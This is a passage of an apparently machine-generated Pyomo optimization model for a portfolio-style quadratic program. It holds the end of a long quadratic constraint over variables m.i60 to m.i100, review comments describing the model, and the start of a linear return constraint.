0.00518592*m.i60*m.i80 + 0.00542166*m.i60*m.i81 + 0.0031059*m.i60*m.i82 - 0.001025068*m.i60*m.i83
+ 0.0028835*m.i60*m.i84 + 0.00445296*m.i60*m.i85 + 0.00423572*m.i60*m.i86 + 0.0051822*m.i60*
m.i87 + 0.01112192*m.i60*m.i88 + 0.00500464*m.i60*m.i89 + 0.0062184*m.i60*m.i90 + 0.00602*m.i60*
m.i91 + 0.00246398*m.i60*m.i92 + 0.00288384*m.i60*m.i93 + 0.00278724*m.i60*m.i94 + 0.00626372*
m.i60*m.i95 + 0.01170704*m.i60*m.i96 + 0.00615192*m.i60*m.i97 + 0.00462302*m.i60*m.i98 +
0.00471294*m.i60*m.i99 + 0.00588256*m.i60*m.i100 + 0.0418718*m.i61*m.i62 + 0.0230598*m.i61*m.i63
+ 0.01842282*m.i61*m.i64 + 0.01721234*m.i61*m.i65 + 0.00990124*m.i61*m.i66 + 0.0216044*m.i61*
m.i67 + 0.01473812*m.i61*m.i68 + 0.0394464*m.i61*m.i69 + 0.01716988*m.i61*m.i70 + 0.0195513*m.i61
*m.i71 + 0.0219932*m.i61*m.i72 + 0.01943214*m.i61*m.i73 + 0.020134*m.i61*m.i74 + 0.0174732*m.i61*
m.i75 + 0.01174406*m.i61*m.i76 + 0.01834496*m.i61*m.i77 + 0.01109086*m.i61*m.i78 + 0.0264464*
m.i61*m.i79 + 0.01965936*m.i61*m.i80 + 0.0227546*m.i61*m.i81 + 0.00831452*m.i61*m.i82 +
0.00631004*m.i61*m.i83 + 0.01801602*m.i61*m.i84 + 0.01882322*m.i61*m.i85 + 0.026381*m.i61*m.i86
+ 0.0201168*m.i61*m.i87 + 0.0582994*m.i61*m.i88 + 0.01420784*m.i61*m.i89 + 0.0279352*m.i61*m.i90
+ 0.0260044*m.i61*m.i91 + 0.01994278*m.i61*m.i92 + 0.00558188*m.i61*m.i93 + 0.0100806*m.i61*
m.i94 + 0.0228614*m.i61*m.i95 + 0.0472894*m.i61*m.i96 + 0.0277624*m.i61*m.i97 + 0.0233414*m.i61*
m.i98 + 0.0320998*m.i61*m.i99 + 0.037788*m.i61*m.i100 + 0.0226754*m.i62*m.i63 + 0.01497022*m.i62*
m.i64 + 0.0138219*m.i62*m.i65 + 0.00559668*m.i62*m.i66 + 0.01850946*m.i62*m.i67 + 0.01131414*
m.i62*m.i68 + 0.0392412*m.i62*m.i69 + 0.01609634*m.i62*m.i70 + 0.0216048*m.i62*m.i71 + 0.0216526*
m.i62*m.i72 + 0.0150155*m.i62*m.i73 + 0.01738604*m.i62*m.i74 + 0.01374744*m.i62*m.i75 +
0.00779326*m.i62*m.i76 + 0.01429558*m.i62*m.i77 + 0.0081994*m.i62*m.i78 + 0.024889*m.i62*m.i79 +
0.01494124*m.i62*m.i80 + 0.0229898*m.i62*m.i81 + 0.00445144*m.i62*m.i82 + 0.01114552*m.i62*m.i83
+ 0.01793036*m.i62*m.i84 + 0.01444614*m.i62*m.i85 + 0.01879448*m.i62*m.i86 + 0.01466504*m.i62*
m.i87 + 0.0326604*m.i62*m.i88 + 0.01169144*m.i62*m.i89 + 0.0254028*m.i62*m.i90 + 0.01965996*m.i62
*m.i91 + 0.01132102*m.i62*m.i92 + 0.0046546*m.i62*m.i93 + 0.00635342*m.i62*m.i94 + 0.0209304*
m.i62*m.i95 + 0.040751*m.i62*m.i96 + 0.0251822*m.i62*m.i97 + 0.0238578*m.i62*m.i98 + 0.0225858*
m.i62*m.i99 + 0.0313134*m.i62*m.i100 + 0.01545704*m.i63*m.i64 + 0.01086358*m.i63*m.i65 +
0.00996396*m.i63*m.i66 + 0.00982328*m.i63*m.i67 + 0.00892944*m.i63*m.i68 + 0.024956*m.i63*m.i69
+ 0.0125295*m.i63*m.i70 + 0.0274234*m.i63*m.i71 + 0.0136346*m.i63*m.i72 + 0.0143589*m.i63*m.i73
+ 0.01281966*m.i63*m.i74 + 0.009889*m.i63*m.i75 + 0.00617316*m.i63*m.i76 + 0.0195622*m.i63*m.i77
+ 0.00502572*m.i63*m.i78 + 0.00153262*m.i63*m.i79 + 0.01706792*m.i63*m.i80 + 0.01790944*m.i63*
m.i81 + 0.001490592*m.i63*m.i82 + 0.0267338*m.i63*m.i83 + 0.01586496*m.i63*m.i84 + 0.01166282*
m.i63*m.i85 + 0.01568614*m.i63*m.i86 + 0.00753188*m.i63*m.i87 + 0.0417782*m.i63*m.i88 + 0.0112216
*m.i63*m.i89 + 0.00371206*m.i63*m.i90 + 0.01829192*m.i63*m.i91 + 0.01841964*m.i63*m.i92 +
0.00206622*m.i63*m.i93 + 0.00505172*m.i63*m.i94 + 0.01487174*m.i63*m.i95 + 0.01414348*m.i63*m.i96
+ 0.0156802*m.i63*m.i97 + 0.01823426*m.i63*m.i98 + 0.01258764*m.i63*m.i99 + 0.01994098*m.i63*
m.i100 + 0.00854654*m.i64*m.i65 + 0.01079866*m.i64*m.i66 + 0.00602732*m.i64*m.i67 + 0.00921276*
m.i64*m.i68 + 0.01464414*m.i64*m.i69 + 0.00664932*m.i64*m.i70 + 0.0144736*m.i64*m.i71 +
0.00978338*m.i64*m.i72 + 0.00959208*m.i64*m.i73 + 0.0112566*m.i64*m.i74 + 0.00671142*m.i64*m.i75
+ 0.00408206*m.i64*m.i76 + 0.01167568*m.i64*m.i77 + 0.00375274*m.i64*m.i78 + 0.00404336*m.i64*
m.i79 + 0.00963238*m.i64*m.i80 + 0.0122908*m.i64*m.i81 + 0.001806772*m.i64*m.i82 + 0.01577266*
m.i64*m.i83 + 0.01128074*m.i64*m.i84 + 0.0095111*m.i64*m.i85 + 0.0097723*m.i64*m.i86 + 0.00346618
*m.i64*m.i87 + 0.01289324*m.i64*m.i88 + 0.00453186*m.i64*m.i89 + 0.0078486*m.i64*m.i90 +
0.01310134*m.i64*m.i91 + 0.00985686*m.i64*m.i92 + 0.00257788*m.i64*m.i93 + 0.00260324*m.i64*m.i94
+ 0.0108877*m.i64*m.i95 + 0.01349616*m.i64*m.i96 + 0.01306042*m.i64*m.i97 + 0.01405114*m.i64*
m.i98 + 0.0115142*m.i64*m.i99 + 0.01728302*m.i64*m.i100 + 0.0048225*m.i65*m.i66 + 0.00871696*
m.i65*m.i67 + 0.00504014*m.i65*m.i68 + 0.01673796*m.i65*m.i69 + 0.00728674*m.i65*m.i70 +
0.00969202*m.i65*m.i71 + 0.0082057*m.i65*m.i72 + 0.0103704*m.i65*m.i73 + 0.00998004*m.i65*m.i74
+ 0.00672722*m.i65*m.i75 + 0.00633346*m.i65*m.i76 + 0.00774852*m.i65*m.i77 + 0.00440922*m.i65*
m.i78 + 0.01343946*m.i65*m.i79 + 0.00798994*m.i65*m.i80 + 0.01225132*m.i65*m.i81 + 0.00444398*
m.i65*m.i82 + 0.00673302*m.i65*m.i83 + 0.0109598*m.i65*m.i84 + 0.00683186*m.i65*m.i85 +
0.01183874*m.i65*m.i86 + 0.0090907*m.i65*m.i87 + 0.0283952*m.i65*m.i88 + 0.00785096*m.i65*m.i89
+ 0.01125058*m.i65*m.i90 + 0.00510526*m.i65*m.i91 + 0.00837574*m.i65*m.i92 + 0.00385798*m.i65*
m.i93 + 0.00464904*m.i65*m.i94 + 0.00896456*m.i65*m.i95 + 0.0160694*m.i65*m.i96 + 0.0113557*m.i65
*m.i97 + 0.01155766*m.i65*m.i98 + 0.01443876*m.i65*m.i99 + 0.01238186*m.i65*m.i100 + 0.00548536*
m.i66*m.i67 + 0.00630564*m.i66*m.i68 + 0.00939978*m.i66*m.i69 + 0.00431468*m.i66*m.i70 +
0.01542742*m.i66*m.i71 + 0.0071665*m.i66*m.i72 + 0.00755022*m.i66*m.i73 + 0.00838922*m.i66*m.i74
+ 0.00386922*m.i66*m.i75 + 0.001951058*m.i66*m.i76 + 0.01146338*m.i66*m.i77 + 0.001980078*m.i66*
m.i78 + 0.00444902*m.i66*m.i79 + 0.00356762*m.i66*m.i80 + 0.00956806*m.i66*m.i81 - 0.00023183*
m.i66*m.i82 + 0.01703884*m.i66*m.i83 + 0.01002452*m.i66*m.i84 + 0.0062546*m.i66*m.i85 +
0.00563304*m.i66*m.i86 + 0.00514984*m.i66*m.i87 + 0.01908326*m.i66*m.i88 + 0.00457928*m.i66*m.i89
+ 0.003995*m.i66*m.i90 + 0.0080501*m.i66*m.i91 + 0.00810108*m.i66*m.i92 + 0.00328186*m.i66*m.i93
+ 0.00369064*m.i66*m.i94 + 0.0058103*m.i66*m.i95 + 0.00438208*m.i66*m.i96 + 0.00867896*m.i66*
m.i97 + 0.0114927*m.i66*m.i98 + 0.01103938*m.i66*m.i99 + 0.00981454*m.i66*m.i100 + 0.00310364*
m.i67*m.i68 + 0.0195756*m.i67*m.i69 + 0.00833924*m.i67*m.i70 + 0.01122*m.i67*m.i71 + 0.00862168*
m.i67*m.i72 + 0.00711248*m.i67*m.i73 + 0.00958304*m.i67*m.i74 + 0.00671208*m.i67*m.i75 +
0.00667666*m.i67*m.i76 + 0.00639998*m.i67*m.i77 + 0.00746068*m.i67*m.i78 + 0.0164696*m.i67*m.i79
+ 0.00952472*m.i67*m.i80 + 0.01054908*m.i67*m.i81 + 0.00295206*m.i67*m.i82 + 0.00786538*m.i67*
m.i83 + 0.00812566*m.i67*m.i84 + 0.00774908*m.i67*m.i85 + 0.01084866*m.i67*m.i86 + 0.01179554*
m.i67*m.i87 + 0.022894*m.i67*m.i88 + 0.00619526*m.i67*m.i89 + 0.01517056*m.i67*m.i90 + 0.00567344
*m.i67*m.i91 + 0.00901318*m.i67*m.i92 + 0.00388018*m.i67*m.i93 + 0.0036956*m.i67*m.i94 + 0.008896
*m.i67*m.i95 + 0.021896*m.i67*m.i96 + 0.01327636*m.i67*m.i97 + 0.0109*m.i67*m.i98 + 0.0178563*
m.i67*m.i99 + 0.01328366*m.i67*m.i100 + 0.01361686*m.i68*m.i69 + 0.00764086*m.i68*m.i70 +
0.00794036*m.i68*m.i71 + 0.01077146*m.i68*m.i72 + 0.00701056*m.i68*m.i73 + 0.00764336*m.i68*m.i74
+ 0.01085638*m.i68*m.i75 + 0.00267198*m.i68*m.i76 + 0.00622086*m.i68*m.i77 + 0.0026961*m.i68*
m.i78 + 0.01283914*m.i68*m.i79 + 0.00651186*m.i68*m.i80 + 0.00444824*m.i68*m.i81 + 0.00245108*
m.i68*m.i82 - 0.000724804*m.i68*m.i83 + 0.01001432*m.i68*m.i84 + 0.00659112*m.i68*m.i85 +
0.00798872*m.i68*m.i86 + 0.00378278*m.i68*m.i87 + 0.0249894*m.i68*m.i88 + 0.00935338*m.i68*m.i89
+ 0.00406214*m.i68*m.i90 + 0.01547864*m.i68*m.i91 + 0.0026383*m.i68*m.i92 + 0.001956366*m.i68*
m.i93 + 0.00433104*m.i68*m.i94 + 0.0086862*m.i68*m.i95 + 0.00871594*m.i68*m.i96 + 0.00917804*
m.i68*m.i97 + 0.01147728*m.i68*m.i98 + 0.000904318*m.i68*m.i99 + 0.0095902*m.i68*m.i100 +
0.01716134*m.i69*m.i70 + 0.0210128*m.i69*m.i71 + 0.01970512*m.i69*m.i72 + 0.01824406*m.i69*m.i73
+ 0.0202038*m.i69*m.i74 + 0.0166321*m.i69*m.i75 + 0.0080034*m.i69*m.i76 + 0.01785698*m.i69*m.i77
+ 0.00956708*m.i69*m.i78 + 0.0273938*m.i69*m.i79 + 0.01578286*m.i69*m.i80 + 0.01986548*m.i69*
m.i81 + 0.00472512*m.i69*m.i82 + 0.0064477*m.i69*m.i83 + 0.0205866*m.i69*m.i84 + 0.01485404*m.i69
*m.i85 + 0.0219926*m.i69*m.i86 + 0.01726592*m.i69*m.i87 + 0.044296*m.i69*m.i88 + 0.01519388*m.i69
*m.i89 + 0.0245318*m.i69*m.i90 + 0.019668*m.i69*m.i91 + 0.01322886*m.i69*m.i92 + 0.00622812*m.i69
*m.i93 + 0.00886068*m.i69*m.i94 + 0.0207946*m.i69*m.i95 + 0.0369544*m.i69*m.i96 + 0.0252064*m.i69
*m.i97 + 0.0246794*m.i69*m.i98 + 0.0240826*m.i69*m.i99 + 0.0322226*m.i69*m.i100 + 0.01122678*
m.i70*m.i71 + 0.00985708*m.i70*m.i72 + 0.00817346*m.i70*m.i73 + 0.01042594*m.i70*m.i74 +
0.0087512*m.i70*m.i75 + 0.00587552*m.i70*m.i76 + 0.00956692*m.i70*m.i77 + 0.00604702*m.i70*m.i78
+ 0.01012786*m.i70*m.i79 + 0.00894572*m.i70*m.i80 + 0.00937532*m.i70*m.i81 + 0.0040741*m.i70*
m.i82 + 0.001290572*m.i70*m.i83 + 0.00820512*m.i70*m.i84 + 0.00683756*m.i70*m.i85 + 0.00768078*
m.i70*m.i86 + 0.00827048*m.i70*m.i87 + 0.01990564*m.i70*m.i88 + 0.007123*m.i70*m.i89 + 0.00998564
*m.i70*m.i90 + 0.00953688*m.i70*m.i91 + 0.00558782*m.i70*m.i92 + 0.00342686*m.i70*m.i93 +
0.00568486*m.i70*m.i94 + 0.00914938*m.i70*m.i95 + 0.01630104*m.i70*m.i96 + 0.01110616*m.i70*m.i97
+ 0.010247*m.i70*m.i98 + 0.00833958*m.i70*m.i99 + 0.01265252*m.i70*m.i100 + 0.0220254*m.i71*
m.i72 + 0.0095213*m.i71*m.i73 + 0.01209936*m.i71*m.i74 + 0.00527094*m.i71*m.i75 + 0.00557218*
m.i71*m.i76 + 0.01262004*m.i71*m.i77 + 0.0037353*m.i71*m.i78 - 0.000223588*m.i71*m.i79 +
0.00801532*m.i71*m.i80 + 0.0286786*m.i71*m.i81 + 0.000788336*m.i71*m.i82 + 0.0387752*m.i71*m.i83
+ 0.01552284*m.i71*m.i84 + 0.00720994*m.i71*m.i85 + 0.01148132*m.i71*m.i86 + 0.00870698*m.i71*
m.i87 + 0.028675*m.i71*m.i88 + 0.00544718*m.i71*m.i89 + 0.00673884*m.i71*m.i90 + 0.01008984*m.i71
*m.i91 + 0.01241834*m.i71*m.i92 + 0.0025495*m.i71*m.i93 + 0.00280272*m.i71*m.i94 + 0.00947552*
m.i71*m.i95 + 0.0070495*m.i71*m.i96 + 0.0170916*m.i71*m.i97 + 0.0269036*m.i71*m.i98 + 0.01506306*
m.i71*m.i99 + 0.0206782*m.i71*m.i100 + 0.00925426*m.i72*m.i73 + 0.00967792*m.i72*m.i74 +
0.00847338*m.i72*m.i75 + 0.005213*m.i72*m.i76 + 0.00908662*m.i72*m.i77 + 0.00316872*m.i72*m.i78
+ 0.00898138*m.i72*m.i79 + 0.0069179*m.i72*m.i80 + 0.0151281*m.i72*m.i81 + 0.00348424*m.i72*
m.i82 + 0.01111986*m.i72*m.i83 + 0.01165966*m.i72*m.i84 + 0.0064802*m.i72*m.i85 + 0.00959246*
m.i72*m.i86 + 0.0084611*m.i72*m.i87 + 0.0240956*m.i72*m.i88 + 0.00687054*m.i72*m.i89 + 0.0094553*
m.i72*m.i90 + 0.0110757*m.i72*m.i91 + 0.00543508*m.i72*m.i92 + 0.0037306*m.i72*m.i93 + 0.00500972
*m.i72*m.i94 + 0.01005818*m.i72*m.i95 + 0.01294332*m.i72*m.i96 + 0.01344022*m.i72*m.i97 +
0.01593132*m.i72*m.i98 + 0.0093216*m.i72*m.i99 + 0.01640118*m.i72*m.i100 + 0.01198598*m.i73*m.i74
+ 0.00750544*m.i73*m.i75 + 0.0050216*m.i73*m.i76 + 0.01285904*m.i73*m.i77 + 0.00339452*m.i73*
m.i78 + 0.00891788*m.i73*m.i79 + 0.00948614*m.i73*m.i80 + 0.00944098*m.i73*m.i81 + 0.00409826*
m.i73*m.i82 + 0.00488372*m.i73*m.i83 + 0.01210326*m.i73*m.i84 + 0.00827726*m.i73*m.i85 +
0.0117403*m.i73*m.i86 + 0.00812428*m.i73*m.i87 + 0.031499*m.i73*m.i88 + 0.00909586*m.i73*m.i89 +
0.00829156*m.i73*m.i90 + 0.0112196*m.i73*m.i91 + 0.00781298*m.i73*m.i92 + 0.00380884*m.i73*m.i93
+ 0.00624296*m.i73*m.i94 + 0.01005016*m.i73*m.i95 + 0.01437472*m.i73*m.i96 + 0.011277*m.i73*
m.i97 + 0.01058622*m.i73*m.i98 + 0.0121454*m.i73*m.i99 + 0.01373088*m.i73*m.i100 + 0.01080198*
m.i74*m.i75 + 0.00656182*m.i74*m.i76 + 0.01437682*m.i74*m.i77 + 0.00746976*m.i74*m.i78 +
0.0158128*m.i74*m.i79 + 0.01161714*m.i74*m.i80 + 0.01098286*m.i74*m.i81 + 0.00409892*m.i74*m.i82
+ 0.00263806*m.i74*m.i83 + 0.01368742*m.i74*m.i84 + 0.00966578*m.i74*m.i85 + 0.0126469*m.i74*
m.i86 + 0.0097362*m.i74*m.i87 + 0.0236752*m.i74*m.i88 + 0.0087263*m.i74*m.i89 + 0.01653132*m.i74*
m.i90 + 0.01259886*m.i74*m.i91 + 0.0074886*m.i74*m.i92 + 0.00612882*m.i74*m.i93 + 0.00553384*
m.i74*m.i94 + 0.01256076*m.i74*m.i95 + 0.022837*m.i74*m.i96 + 0.01489052*m.i74*m.i97 + 0.0138654*
m.i74*m.i98 + 0.01608016*m.i74*m.i99 + 0.0185439*m.i74*m.i100 + 0.00483222*m.i75*m.i76 +
0.0084646*m.i75*m.i77 + 0.00605234*m.i75*m.i78 + 0.01627408*m.i75*m.i79 + 0.00784142*m.i75*m.i80
+ 0.00564276*m.i75*m.i81 + 0.00324588*m.i75*m.i82 - 0.00767236*m.i75*m.i83 + 0.00699372*m.i75*
m.i84 + 0.00737608*m.i75*m.i85 + 0.00954642*m.i75*m.i86 + 0.00823136*m.i75*m.i87 + 0.0262748*
m.i75*m.i88 + 0.00948902*m.i75*m.i89 + 0.01252876*m.i75*m.i90 + 0.01423104*m.i75*m.i91 +
0.00521492*m.i75*m.i92 + 0.00397698*m.i75*m.i93 + 0.00422896*m.i75*m.i94 + 0.01025216*m.i75*m.i95
+ 0.021456*m.i75*m.i96 + 0.01000128*m.i75*m.i97 + 0.00860654*m.i75*m.i98 + 0.0079023*m.i75*m.i99
+ 0.01223272*m.i75*m.i100 + 0.00508036*m.i76*m.i77 + 0.00440326*m.i76*m.i78 + 0.00722936*m.i76*
m.i79 + 0.00592748*m.i76*m.i80 + 0.00543106*m.i76*m.i81 + 0.00352072*m.i76*m.i82 + 0.00282876*
m.i76*m.i83 + 0.00421804*m.i76*m.i84 + 0.00327576*m.i76*m.i85 + 0.00605002*m.i76*m.i86 +
0.00724932*m.i76*m.i87 + 0.01581762*m.i76*m.i88 + 0.00366428*m.i76*m.i89 + 0.00812736*m.i76*m.i90
+ 0.00388382*m.i76*m.i91 + 0.0047062*m.i76*m.i92 + 0.00287772*m.i76*m.i93 + 0.00297876*m.i76*
m.i94 + 0.00459654*m.i76*m.i95 + 0.01070758*m.i76*m.i96 + 0.0061617*m.i76*m.i97 + 0.00324936*
m.i76*m.i98 + 0.00970994*m.i76*m.i99 + 0.00690694*m.i76*m.i100 + 0.00393188*m.i77*m.i78 +
0.00648912*m.i77*m.i79 + 0.00880144*m.i77*m.i80 + 0.00990674*m.i77*m.i81 + 0.00277832*m.i77*m.i82
+ 0.01369158*m.i77*m.i83 + 0.01108874*m.i77*m.i84 + 0.00804488*m.i77*m.i85 + 0.0100624*m.i77*
m.i86 + 0.00868852*m.i77*m.i87 + 0.0320896*m.i77*m.i88 + 0.00865688*m.i77*m.i89 + 0.00846622*
m.i77*m.i90 + 0.01262084*m.i77*m.i91 + 0.01111726*m.i77*m.i92 + 0.00462154*m.i77*m.i93 +
0.00718072*m.i77*m.i94 + 0.01147082*m.i77*m.i95 + 0.0176254*m.i77*m.i96 + 0.01224072*m.i77*m.i97
+ 0.00939734*m.i77*m.i98 + 0.012534*m.i77*m.i99 + 0.01295098*m.i77*m.i100 + 0.00907912*m.i78*
m.i79 + 0.00720642*m.i78*m.i80 + 0.00426806*m.i78*m.i81 + 0.0028332*m.i78*m.i82 - 0.001354666*
m.i78*m.i83 + 0.00318608*m.i78*m.i84 + 0.00627032*m.i78*m.i85 + 0.00574778*m.i78*m.i86 +
0.00663794*m.i78*m.i87 + 0.00493084*m.i78*m.i88 + 0.00225816*m.i78*m.i89 + 0.01063042*m.i78*m.i90
+ 0.0063342*m.i78*m.i91 + 0.00541402*m.i78*m.i92 + 0.00268782*m.i78*m.i93 + 0.00290288*m.i78*
m.i94 + 0.00588184*m.i78*m.i95 + 0.01436716*m.i78*m.i96 + 0.00728756*m.i78*m.i97 + 0.00442972*
m.i78*m.i98 + 0.00924454*m.i78*m.i99 + 0.00979098*m.i78*m.i100 + 0.0060581*m.i79*m.i80 +
0.00755126*m.i79*m.i81 + 0.00637932*m.i79*m.i82 - 0.00105651*m.i79*m.i83 + 0.01349704*m.i79*m.i84
+ 0.01178354*m.i79*m.i85 + 0.0220208*m.i79*m.i86 + 0.0245836*m.i79*m.i87 + 0.0524002*m.i79*m.i88
+ 0.0230428*m.i79*m.i89 + 0.0314514*m.i79*m.i90 + 0.00636018*m.i79*m.i91 + 0.0061917*m.i79*m.i92
+ 0.01207768*m.i79*m.i93 + 0.00753416*m.i79*m.i94 + 0.01719794*m.i79*m.i95 + 0.0367202*m.i79*
m.i96 + 0.01636496*m.i79*m.i97 + 0.01053626*m.i79*m.i98 + 0.0223148*m.i79*m.i99 + 0.0125583*m.i79
*m.i100 + 0.00731124*m.i80*m.i81 + 0.0043053*m.i80*m.i82 + 0.00250064*m.i80*m.i83 + 0.00942746*
m.i80*m.i84 + 0.01109824*m.i80*m.i85 + 0.0094077*m.i80*m.i86 + 0.00584688*m.i80*m.i87 +
0.01773876*m.i80*m.i88 + 0.00587054*m.i80*m.i89 + 0.0073899*m.i80*m.i90 + 0.01217556*m.i80*m.i91
+ 0.0092825*m.i80*m.i92 + 0.001672258*m.i80*m.i93 + 0.00403362*m.i80*m.i94 + 0.01001412*m.i80*
m.i95 + 0.01641906*m.i80*m.i96 + 0.01159292*m.i80*m.i97 + 0.01062798*m.i80*m.i98 + 0.00967468*
m.i80*m.i99 + 0.0140493*m.i80*m.i100 + 0.00288116*m.i81*m.i82 + 0.022981*m.i81*m.i83 + 0.01105584
*m.i81*m.i84 + 0.00722284*m.i81*m.i85 + 0.01178602*m.i81*m.i86 + 0.00945868*m.i81*m.i87 +
0.024973*m.i81*m.i88 + 0.00575624*m.i81*m.i89 + 0.01415098*m.i81*m.i90 + 0.0066048*m.i81*m.i91 +
0.01072344*m.i81*m.i92 + 0.00322326*m.i81*m.i93 + 0.00351188*m.i81*m.i94 + 0.01127788*m.i81*m.i95
+ 0.01956074*m.i81*m.i96 + 0.01617428*m.i81*m.i97 + 0.0227228*m.i81*m.i98 + 0.01855842*m.i81*
m.i99 + 0.01991896*m.i81*m.i100 - 0.00333172*m.i82*m.i83 + 0.00228114*m.i82*m.i84 + 0.00336158*
m.i82*m.i85 + 0.00354748*m.i82*m.i86 + 0.00514572*m.i82*m.i87 + 0.00636398*m.i82*m.i88 +
0.00276272*m.i82*m.i89 + 0.00394504*m.i82*m.i90 + 0.00242814*m.i82*m.i91 + 0.00151634*m.i82*m.i92
+ 0.00205258*m.i82*m.i93 + 0.00416174*m.i82*m.i94 + 0.0036601*m.i82*m.i95 + 0.00573294*m.i82*
m.i96 + 0.0040347*m.i82*m.i97 + 0.001040396*m.i82*m.i98 + 0.00519918*m.i82*m.i99 + 0.00479088*
m.i82*m.i100 + 0.01497528*m.i83*m.i84 + 0.0032291*m.i83*m.i85 + 0.01011148*m.i83*m.i86 +
0.00471364*m.i83*m.i87 + 0.0246434*m.i83*m.i88 + 0.000996878*m.i83*m.i89 - 0.00262512*m.i83*m.i90
- 0.000789784*m.i83*m.i91 + 0.01304756*m.i83*m.i92 + 0.000531142*m.i83*m.i93 - 0.000443948*m.i83
*m.i94 + 0.00279848*m.i83*m.i95 - 0.0065326*m.i83*m.i96 + 0.01221224*m.i83*m.i97 + 0.01799712*
m.i83*m.i98 + 0.0158385*m.i83*m.i99 + 0.0071337*m.i83*m.i100 + 0.00892568*m.i84*m.i85 +
0.01364388*m.i84*m.i86 + 0.0072533*m.i84*m.i87 + 0.0326884*m.i84*m.i88 + 0.00896504*m.i84*m.i89
+ 0.00823562*m.i84*m.i90 + 0.0125821*m.i84*m.i91 + 0.00787816*m.i84*m.i92 + 0.00249586*m.i84*
m.i93 + 0.00519262*m.i84*m.i94 + 0.01044988*m.i84*m.i95 + 0.01107886*m.i84*m.i96 + 0.0139867*
m.i84*m.i97 + 0.01596046*m.i84*m.i98 + 0.01218826*m.i84*m.i99 + 0.01543212*m.i84*m.i100 +
0.00990954*m.i85*m.i86 + 0.00725662*m.i85*m.i87 + 0.0133432*m.i85*m.i88 + 0.00507396*m.i85*m.i89
+ 0.00930526*m.i85*m.i90 + 0.01462284*m.i85*m.i91 + 0.01055408*m.i85*m.i92 + 0.00190258*m.i85*
m.i93 + 0.00468802*m.i85*m.i94 + 0.0107648*m.i85*m.i95 + 0.01646608*m.i85*m.i96 + 0.01215728*
m.i85*m.i97 + 0.01028698*m.i85*m.i98 + 0.01183266*m.i85*m.i99 + 0.01660366*m.i85*m.i100 +
0.0120373*m.i86*m.i87 + 0.0422718*m.i86*m.i88 + 0.00969238*m.i86*m.i89 + 0.01765146*m.i86*m.i90
+ 0.01429788*m.i86*m.i91 + 0.0124585*m.i86*m.i92 + 0.0040945*m.i86*m.i93 + 0.0046898*m.i86*m.i94
+ 0.01232074*m.i86*m.i95 + 0.0222548*m.i86*m.i96 + 0.0145479*m.i86*m.i97 + 0.0128277*m.i86*m.i98
+ 0.0192244*m.i86*m.i99 + 0.01947568*m.i86*m.i100 + 0.032904*m.i87*m.i88 + 0.0084843*m.i87*m.i89
+ 0.01591916*m.i87*m.i90 + 0.0059879*m.i87*m.i91 + 0.00789644*m.i87*m.i92 + 0.00607862*m.i87*
m.i93 + 0.00667478*m.i87*m.i94 + 0.0088746*m.i87*m.i95 + 0.01963916*m.i87*m.i96 + 0.01115822*
m.i87*m.i97 + 0.0065973*m.i87*m.i98 + 0.01821046*m.i87*m.i99 + 0.01269924*m.i87*m.i100 + 0.04164*
m.i88*m.i89 + 0.01700894*m.i88*m.i90 + 0.0282218*m.i88*m.i91 + 0.0247666*m.i88*m.i92 + 0.00860626
*m.i88*m.i93 + 0.0146832*m.i88*m.i94 + 0.0207292*m.i88*m.i95 + 0.0482992*m.i88*m.i96 + 0.026772*
m.i88*m.i97 + 0.0300758*m.i88*m.i98 + 0.0329128*m.i88*m.i99 + 0.01375988*m.i88*m.i100 +
0.00594302*m.i89*m.i90 + 0.00801468*m.i89*m.i91 + 0.00437824*m.i89*m.i92 + 0.00302882*m.i89*m.i93
+ 0.0041304*m.i89*m.i94 + 0.00803522*m.i89*m.i95 + 0.01620516*m.i89*m.i96 + 0.00836644*m.i89*
m.i97 + 0.01022328*m.i89*m.i98 + 0.0069101*m.i89*m.i99 + 0.00464412*m.i89*m.i100 + 0.01014268*
m.i90*m.i91 + 0.00890216*m.i90*m.i92 + 0.00857494*m.i90*m.i93 + 0.00416286*m.i90*m.i94 +
0.01435266*m.i90*m.i95 + 0.038709*m.i90*m.i96 + 0.01593092*m.i90*m.i97 + 0.0108455*m.i90*m.i98 +
0.0247362*m.i90*m.i99 + 0.0239224*m.i90*m.i100 + 0.01172504*m.i91*m.i92 - 3.25928e-5*m.i91*m.i93
+ 0.00582154*m.i91*m.i94 + 0.01455814*m.i91*m.i95 + 0.0217724*m.i91*m.i96 + 0.01520358*m.i91*
m.i97 + 0.01361584*m.i91*m.i98 + 0.01107608*m.i91*m.i99 + 0.0218082*m.i91*m.i100 + 0.000834202*
m.i92*m.i93 + 0.00361846*m.i92*m.i94 + 0.00964536*m.i92*m.i95 + 0.01621624*m.i92*m.i96 +
0.01139352*m.i92*m.i97 + 0.01032652*m.i92*m.i98 + 0.01663626*m.i92*m.i99 + 0.01551254*m.i92*
m.i100 + 0.00302326*m.i93*m.i94 + 0.0039602*m.i93*m.i95 + 0.0070366*m.i93*m.i96 + 0.0035814*m.i93
*m.i97 + 0.00156313*m.i93*m.i98 + 0.00599576*m.i93*m.i99 + 0.00427812*m.i93*m.i100 + 0.00550244*
m.i94*m.i95 + 0.00558508*m.i94*m.i96 + 0.0059384*m.i94*m.i97 + 0.00357124*m.i94*m.i98 + 0.0064057
*m.i94*m.i99 + 0.00623724*m.i94*m.i100 + 0.0227304*m.i95*m.i96 + 0.01445112*m.i95*m.i97 +
0.01257804*m.i95*m.i98 + 0.01368382*m.i95*m.i99 + 0.01773414*m.i95*m.i100 + 0.0257114*m.i96*m.i97
+ 0.01933344*m.i96*m.i98 + 0.0317874*m.i96*m.i99 + 0.0306278*m.i96*m.i100 + 0.01873902*m.i97*
m.i98 + 0.01912542*m.i97*m.i99 + 0.0219022*m.i97*m.i100 + 0.01388668*m.i98*m.i99 + 0.0207524*
m.i98*m.i100 + 0.0256994*m.i99*m.i100 - m.x101 <= 0)
# NOTE(review): generated model fragment (reads like GAMS Convert / Pyomo
# output for a portfolio-style QP in which m.i1..m.i100 are the decision
# variables and m.x101 an auxiliary variable bounded by the quadratic form in
# c1) -- confirm against the model header, which is outside this chunk.
# The coefficient data below is machine-generated; do not hand-edit it.

# c2: linear inequality over all 100 variables with small signed coefficients
# (presumably per-asset expected rates of return); their weighted sum must be
# non-negative.
m.c2 = Constraint(expr= 0.00311438*m.i1 - 0.0196628*m.i2 - 0.0134176*m.i3 - 0.00687102*m.i4 - 0.0147519*m.i5
                        - 0.0184501*m.i6 - 0.0153449*m.i7 - 0.136908*m.i8 + 0.0173991*m.i9 - 0.00159102*m.i10
                        - 0.0468625*m.i11 + 0.00163166*m.i12 - 0.00431355*m.i13 - 0.0377972*m.i14 - 0.0149845*m.i15
